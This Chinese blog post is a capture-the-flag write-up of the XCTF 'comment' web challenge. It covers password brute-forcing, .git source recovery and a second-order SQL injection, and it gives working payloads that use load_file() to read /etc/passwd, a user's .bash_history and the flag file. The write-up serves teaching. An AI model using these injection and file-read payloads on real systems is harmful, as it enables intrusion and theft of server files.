攻防世界web进阶区comment详解

最新推荐文章于 2024-04-13 14:44:13 发布
最新推荐文章于 2024-04-13 14:44:13 发布
阅读量1.4k 收藏 6
点赞数 4
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hxhxhxhxx/article/details/107937982
版权

攻防世界web进阶区comment详解

题目

在这里插入图片描述

详解

在这里插入图片描述
只要我们输入任何一个评论,他就会让我们进行登录,
我们可以通过他的文字提示,发现少了三位,一般我们都会上数字
在这里插入图片描述
我们发现他666的时候有一个302的跳转
登录以后,感觉也没有什么可以注入的
正常也没有回显,这时候,我们的御剑传来了好消息
在这里插入图片描述
有个.git,应该是git源码泄露。使用githack 下载源代码。
在这里插入图片描述

<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
    break;
case 'comment':
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>

哦~这里提示,他的git跑路了,所以他这个源码下载的不全!
我们找到大佬的修复脚本
将commit补上
这里涉及到git修复
在这里插入图片描述
我们使用大佬脚本修复的时候,记得使用linux进行,win亲测不行

见这里:
https://www.cnblogs.com/Tkitn/p/11648456.html
在这里插入图片描述
执行这一条命令
在这里插入图片描述
我们执行这一条,后面的是复制上面commit的第一个内容
在这里插入图片描述
执行完之后的效果,
和第一副图就有了区别
在这里插入图片描述
我们的代码就全了
在这里插入图片描述

<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
    $category = addslashes($_POST['category']);
    $title = addslashes($_POST['title']);
    $content = addslashes($_POST['content']);
    $sql = "insert into board
            set category = '$category',
                title = '$title',
                content = '$content'";
    $result = mysql_query($sql);
    header("Location: ./index.php");
    break;
case 'comment':
    $bo_id = addslashes($_POST['bo_id']);
    $sql = "select category from board where id='$bo_id'";
    $result = mysql_query($sql);
    $num = mysql_num_rows($result);
    if($num>0){
    $category = mysql_fetch_array($result)['category'];
    $content = addslashes($_POST['content']);
    $sql = "insert into comment
            set category = '$category',
                content = '$content',
                bo_id = '$bo_id'";
    $result = mysql_query($sql);
    }
    header("Location: ./comment.php?id=$bo_id");
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>

在这里插入图片描述
这里很明显u才能在二次注入,他并没有对信息做出任何处理
但是这里有一个坑

#只能注释同一行,这里需要注释/**/来进行两行的注释
这是我们最后的语句

$sql = "insert into comment
            set category = '123',content=user(),/*',
                content = '*/#',
                bo_id = '$bo_id'";

在CATEGORY“处存入我们的恶意payload的前部分
在评论处补充后半部分
在这里插入图片描述
发现有一个ctf的数据库
在这里插入图片描述
首先常规的读文件payload:123',content=(select( load_file('/etc/passwd'))),/*
在这里插入图片描述
根据bash我们进行读取文件
www用户,读取他的history文件,里面存着他所有的命令
构造123’,content=(select (load_file(’/home/www/.bash_history’))),/*
得到
在这里插入图片描述

cd /tmp/
unzip html.zip 
rm -f html.zip 
cp -r html /var/www/ 
cd /var/www/html/ 
rm -f .DS_Store 
service apache2 start

history命令说明原本/tmp/html/目录下有个.DS_Store文件。那么读取他
payload:123',content=(select (load_file('/tmp/html/.DS_Store'))),/*
在这里插入图片描述
发现读不全
我们进行编码一下
长度不够,那么hex编码一下。

payload:123',content=(select hex(load_file('/tmp/html/.DS_Store'))),/*
在这里插入图片描述
得到

00000001427564310000100000000800000010000000040A000000000000000000000000000000000000000000000800000008000000000000000000000000000000000000000002000000000000000B000000010000100000730074007200610070496C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000B000000090062006F006F007400730074007200610070496C6F63626C6F62000000100000004600000028FFFFFFFFFFFF00000000000B0063006F006D006D0065006E0074002E007000680070496C6F63626C6F6200000010000000CC0000002800000001FFFF000000000003006300730073496C6F63626C6F62000000100000015200000028FFFFFFFFFFFF0000000000190066006C00610067005F0038003900340036006500310066006600310065006500330065003400300066002E007000680070496C6F63626C6F6200000010000001D800000028FFFFFFFFFFFF0000000000050066006F006E00740073496C6F63626C6F62000000100000004600000098FFFFFFFFFFFF0000000000090069006E006400650078002E007000680070496C6F63626C6F6200000010000000CC0000009800000002FFFF000000000002006A0073496C6F63626C6F62000000100000015200000098FFFFFFFFFFFF000000000009006C006F00670069006E002E007000680070496C6F63626C6F6200000010000001D800000098FFFFFFFFFFFF000000000009006D007900730071006C002E007000680070496C6F63626C6F62000000100000004600000108FFFFFFFFFFFF00000000000600760065006E0064006F0072496C6F63626C6F6200000010000000CC00000108FFFFFFFFFFFF00000000000C00770072006900740065005F0064006F002E007000680070496C6F63626C6F62000000100000015200000108FFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000080B000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000002000000001000000400000000100000080000000010000010000000001000002000000000100000400000000000000000100001000000000010000200000000001000040000000000100008000000000010001000000000001000200000000000100040000000000010008000000000001001000000000000100200000000000010040000000000001008000000000000101000000000000010200000000000001040000000000000108000000000000011000000000000001200000000000000140000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000000000000100B000000450000040A000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000104445344420000000100000000000000000000000000000000000000000000000200000020000000600000000000000001000000800000000100000100000000010000020000000000000000020000080000001800000000000000000100002000000000010000400000000001000080000000000100010000000000010002000000000001000400000000000100080000000000010010000000000001002000000000000100400000000000010080000000000001010000000000000102000000000000010400000000000001080000000000000110000000000000012000000000000001400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

发现了一个
flag
flag_8946e1ff1ee3e40f.php
在这里插入图片描述
我们读取这个文件试试
这个文件是从/tmp/html目录中copy过来的,我们回到/var/www/html中读取flag。不过发现并没有读取成功。想了一下,可能是因为文件过大。继续用hex编码,成功得到flag.

payload: 123’,content=(select hex(load_file(‘/var/www/html/flag_8946e1ff1ee3e40f.php’))),/*

得到:

3C3F7068700A0924666C61673D22666C61677B30646431346161653831643934393034623334393231313765326133643464667D223B0A3F3E0A

解码得到
在这里插入图片描述
这里也可以直接在/tmp/html目录读取,但是tmp有时会自动清除。

tmp目录解出来的不一样,是个坑

<?php $flag = 'flag{f9ca1a6b-9d78-11e8-90a3-c4b301b7b99b}'; ?>

cp:

Linux cp命令主要用于复制文件或目录。
语法

cp [options] source dest

或

cp [options] source... directory

参数说明:

    -a:此选项通常在复制目录时使用,它保留链接、文件属性,并复制目录下的所有内容。其作用等于dpR参数组合。
    -d:复制时保留链接。这里所说的链接相当于Windows系统中的快捷方式。
    -f:覆盖已经存在的目标文件而不给出提示。
    -i:与-f选项相反,在覆盖目标文件之前给出提示,要求用户确认是否覆盖,回答"y"时目标文件将被覆盖。
    -p:除复制文件的内容外,还把修改时间和访问权限也复制到新文件中。
    -r:若给出的源文件是一个目录文件,此时将复制该目录下所有的子目录和文件。
    -l:不复制文件,只是生成链接文件。

.DS_Store

  .DS_Store(英文全称 Desktop Services Store)是一种由苹果公司的Mac OS X操作系统所创造的隐藏文件,目的在于存贮目录的自定义属性,例如文件们的图标位置或者是背景色的选择。

  相当于 Windows 下的 desktop.ini。
無名之涟
关注
专栏目录
攻防世界web进阶全讲解(超详细的哇)!!(持续更新)
wo41ge的博客
10-13 2491
进入题目链接 有登录 就可能有注册界面 url栏register.php 或者直接上御剑扫一下 同样发现注册界面 注册成功后 进行登录 跳转到了这个界面
攻防世界Webcomment
Light_inthe_eyes的博客
11-03 257
发帖需要登录,提示了我们账户时zhangwei,密码是zhangweixxx,果断暴力破解,得到密码是zhangwei666: 然后发帖,想找到SQL的注入点,可是就是找不到,就翻了翻源代码,在控制台中发现了关键的提示: 提示了.git源码泄露,用御剑也得到了/.git,使用githacker看代码: 没看出什么来,突然想到前面说commit丢失了,那就要将它补上,涉及git修复,给个师傅的修复脚本:git修复 <?php include "mysql.php"; session_start(); i
攻防世界comment
qq_44065556的博客
09-16 526
刚进入看见画面 然后发现页面需要登录 输入框似乎给了提示 burp抓取 弱口令爆破 从爆破情况来看 密码应该是zhangwei666 登录后也没发现什么可以注入 也没有什么变化 习惯性的用dirsearch 扫一下 可以看到.git出现了 那应该是git源码泄露了, 用githack抓下来 我们查看我们抓下来的文件 可以判断 他的源码不完整 缺失了 用脚本给它补上 参考 -> CTF中的git泄露题目 - Tkitn - 博客园 ...
攻防世界-comment
xixihahawuwu的博客
12-15 227
一个留言板扫描目录,发现存在login.php界面。访问 给了我们一个并不完整的登录信息 爆破得到后三位密码666登录成功后发现返回之前的首页 根据题目描述,存在sql注入 扫描目录 发现存在git源码泄露 扒取源码发现write_do.php文件没有什么信息 检查页面元素时发现我们得到的码是不完整的,需要修复 修复完的源码如下: <?php include "mysql.php"; session_start(); if($_SESSION['login'] != 'yes'){ hea
攻防世界 comment
CyhDl666的博客
02-26 509
进去是个留言板页面 发帖需要登录 未登录回跳转到登录页面 一不做二不休 直接dirsearch扫描一下 看看有哪些文件 芜湖!意外发现git泄露!! 还扫到了个mysql.php???访问好像没啥子用 以后再说 GitHack 下载了一下 发现只下载了给write_do.php 代码贴下 <?php include "mysql.php"; session_start(); if($_SESSION['login'] != 'yes'){ header("Location: ./log.
攻防世界高手进阶Web comment
weixin_43093631的博客
06-09 1536
攻防世界高手进阶Web comment 这题我在网上没找到Writeup,所有花了8金币买的。 这题主要考点 爆破 git泄露 代码审计 SQL注入 可以看到账号框账号为:zhangwei 密码为zhangwei*** 所以需要爆破zhangwei后面的三位数,我当时没想到这点看wp才明白的 user:zhangwei pass:zhangwei666 然后扫描目录的时候发现.git文件然后应该是有git源码泄露,过扫描发现到一个write_do.php文件 登陆成功后看到可以发帖加上题目提示sql,
攻防世界-Web进阶篇-005unserialize3】
gyy990526的博客
03-14 2800
解:打开靶机是一段php代码,最后问你?code=应该等于多少,看见_wakeup()就是典型的反序列化的题。 题目比较简单,只有一个xctf类,首先需要对其实例化,再用serialize进行序列化输出字符串 : <?php class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } } $xctf=new xc
攻防世界 web高手进阶 10分题 Guess
闵行小鱼塘
11-03 1366
继续ctf的旅程,开始攻防世界web高手进阶的10分题,本文是Guess的writeup
攻防世界 web高手进阶 10分题 TimeKeeper
闵行小鱼塘
10-19 1443
继续ctf的旅程,开始攻防世界web高手进阶的10分题,本文是TimeKeeper的writeup
攻防世界 web高手进阶 10分题 url
闵行小鱼塘
10-19 1613
继续ctf的旅程,开始攻防世界web高手进阶的10分题,本文是url的writeup
攻防世界-WEB-comment
m0_52061428的博客
01-28 1610
write’操作将用户通过POST方法提交的数据插入到名为’board’的数据库表中,而’comment’操作将用户通过POST方法提交的评论数据插入到名为’comment’的数据库表中。而在comment中,由于他并未对category使用这个函数,原因可能是在comment.php中,我们并不能直接使用category。也就是说,我们可以通过查看www的历史记录以获取一些关键信息,这里我们需要知道的是flag在哪里。一般来说,bash的历史记录保存在home/用户/.bash_history中。
攻防世界 WEB COMMENT
qq_41696858的博客
09-04 334
三个点,git源码泄露,密码爆破,sql二次注入 点进去一个留言窗口,看了看源码,没啥 那就dirsearch扫一波,扫出来一堆git,那么就尝试GitHacker看看能不能跑出来源码 githacker --url http://111.200.241.244:49854/ --folder result3 进到result3里面发现一个write_do.php 看了看源码,明显没写完,case下面直接break 之前扫目录的时候还扫出来一个login.php,进去看看,发现用户名zhangwei,密码z
xctf攻防世界 Web高手进阶 comment
l8947943的博客
01-06 3399
1. 进入环境,查看内容 跳转到login.php 入手点是想办法登录后,再进行操作。 接下来一顿扫描瞅瞅: 2. 问题分析 想办法先登入进去 我们看到文本框提示已经给了zhangwei,密码是zhangwei***,其实就是三位字符补充,在此我们借助burpsuite进行跑字典,如图: 添加payloads,如图: Start attack!慢慢等吧,巨慢,如图: 发现当***为666时候请求302了,emmm,走起,如图: 利用.git获取源码 想到前面dirsearch出来的内容,根
攻防世界 web高手进阶 7分题 comment
闵行小鱼塘
08-11 737
继续ctf的旅程,攻防世界web高手进阶的7分题,本文是comment的writeup
html5中comment注释咋用,comment的用法总结大全
weixin_34593388的博客
06-24 1637
comment的意思n. 评论;注释;意见;说明vt.& vi. 评论,谈论;vt. 表达意见;解释,注释;vi. 作注释;作注解;作解释;作评语comment的用法comment 作名词:1.注释,评注[(+on/about)]2.批评,意见,评论[(+on/about)]He made no comments on our proposal.他对我们的建议没有作评论.3.闲话,议论[(...
CTF之comment
最新发布
qq_74263993的博客
04-13 873
网站的登录框里有提示账号:zhangwei密码:zhangwei***(后三位要自己猜)用burpsuit抓包爆破发现密码为zhangwei666进去后就一个留言榜(目前没发现怎么用)扫一下网站发现git泄露。
BUUCTF之[网鼎杯 2018]Comment
m0_62107966的博客
09-15 1012
BUUCTF之[网鼎杯 2018]Comment 输入:*/# sql语句是换行的,所以我们无法用 单行注释符,必须用/**/拼接,用#闭合sql语句使其执行。可以看到执行成功,返回ctf这个库。首先发帖的时候必须登录,爆破弱密码登录,得到666是满足的后三位密码的。是一个类似留言板的界面,考虑二次注入,并且有git源码泄露。接下来尝试sql语句注入都失败了,看了大佬的wp,用sql来读取文件。在cmment中,对于category的值从数据库取出来没有进行转义
抓取某音短视频数据
2201_75768457的博客
12-28 544
众所周知,某音短视频是没有提供下载链接的,微信视频号也没下载链接,但我就想下载下来,还有视频下面的评论我也想拿到,那要肿么办呢?其实播放链接和评论是可以拿到的抓包通过 mitmproxy 进行抓包在 windows 上直接使用 pip 安装即可我们先看效果,代理配置和证书安装放到最后,要不搞半天还在安装,很占篇幅通过该抓包工具,可以获取所有链接。链接是有特征的,比如某音视频链接一般匹配微信视频号匹配某音视频下的评论匹配所以要下载哪个,替换if我在某音发布了一个视频,一直想把它下载下来。
ctf-wp-comment
dahege666的博客
12-18 578
Comment是代表去添加一些评论或者注释 描述中说“程序员GIT写一半跑路了,没来得及Commit”,这是很明显的一个提示 git stash恢复: 最常用的就是使用git clone把github上的源码下载下来,在实际上当你把代码提交给github时是分为两个步骤的:一个git add,另一个是git commit。 在git工具里存在一个缓存stage,当在工作写完代码后,首先是使用git add,就是把修改后的代码放到了stage缓存,但是修改之前的代码也是可以找打...
攻防世界-baby_web详解
12-21
根据提供的引用内容,攻防世界-baby_web是一个需要进行攻击和防御的网络应用。根据引用和引用[2]的描述,可以看出该应用存在注入漏洞,并且使用了一些安全措施来防止攻击者利用这些漏洞。攻击者可以通过注入恶意代码...
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值